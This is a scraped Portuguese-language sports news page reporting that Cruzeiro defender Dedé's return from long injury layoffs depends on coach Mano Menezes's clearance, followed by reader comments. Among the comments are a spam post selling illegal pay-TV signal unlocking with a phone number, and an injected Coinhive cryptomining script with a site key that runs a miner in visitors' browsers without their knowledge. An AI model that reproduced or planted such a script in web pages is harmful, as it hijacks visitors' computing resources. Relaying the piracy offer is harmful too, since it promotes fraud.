logo

2/2/2018 15:56

Agora é com o chefe: retorno de Dedé depende de Mano Menezes

Agora é com o chefe: retorno de Dedé depende de Mano Menezes
Dedé está de volta ao Cruzeiro e depende apenas de Mano Menezes (Washington Alves/Cruzeiro)


Mais uma vez Dedé está pronto para voltar ao mundo do futebol. Em 2017, após dois anos afastado, o jogador conseguiu retornar, mas poucos jogos depois ele já sentiu novamente dores e precisou ficar outra vez de molho. Agora, o jogador depende apenas da liberação de Mano Menezes para jogar.



Na última semana, Mano disse que toma bastante cuidado com a condição física do jogador.

“O Dedé a gente tem tido um cuidado maior, pois o período foi mais longo e as coisas precisam ser feitas com essa responsabilidade. Até seguramos um pouco o ímpeto do jogador, para dar os passos na medida que sejam seguros para todos”, destacou.

O caso de Dedé chama bastante atenção no Cruzeiro. O jogador não consegue render para o time há algum tempo, por causa das seguidas contusões. No entanto, recentemente o jogador teve seu vínculo alongado. Em dezembro de 2018, o contrato dele se encerra. Pelo lado do atleta existe o desejo de permanecer. Já a Raposa espera que ele consiga retornar antes para mostrar suas qualidades.

4182 visitas - Fonte: Gazeta Espotiva




Ao Dedé toda a felicidade do mundo, que ele consiga retornar em grande estilo, jogando o que ele sabe jogar, e que esta fase negra fique definidamente para trás, que os céus te abençoe, você está voltando e será novamente Campeão Brasileiro! Grave isto!

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

resguardar mas coloca o para jogar logo. se não for assim como vai pegar ritmo (tem o mineiro pra isso )vamos lá

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.